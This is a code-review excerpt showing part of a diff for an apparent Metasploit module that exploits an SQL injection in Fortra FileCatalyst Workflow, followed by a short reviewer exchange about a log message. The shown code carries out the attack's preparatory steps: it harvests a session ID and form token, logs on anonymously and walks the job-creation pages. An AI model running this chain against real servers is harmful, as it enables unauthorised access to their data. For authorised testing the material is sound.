modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,290 @@
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /JSESSIONID=(\w+);/
+      jsessionid = ::Regexp.last_match(1)
+      print_status("JSESSIONID value: #{jsessionid}")
+    else
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.')
+    end
+
+    # 2) logon.jsp to retrieve a valid FCWEB.FORM.TOKEN
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/jsp/logon.jsp;jsessionid=#{jsessionid}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    res = res.body
+    if res =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      token_value = ::Regexp.last_match(1)
+      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    # 3) logonAnonymous.do
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/logonAnonymous.do?FCWEB.FORM.TOKEN=#{token_value}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #1: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    # 4) createNewJob.do
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #2: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    # 5) chooseOrderForm.jsp
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    h2_tag = html.at_css('h2')
+
+    if h2_tag
+      h2_text = h2_tag.text.strip
+      if h2_text == 'Choose an Order Type'
+        print_status('Received expected response.')
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag.')
```

Comment:
Maybe show the unexpected string in the log message?

Reply:
Yes, makes sense, thank you.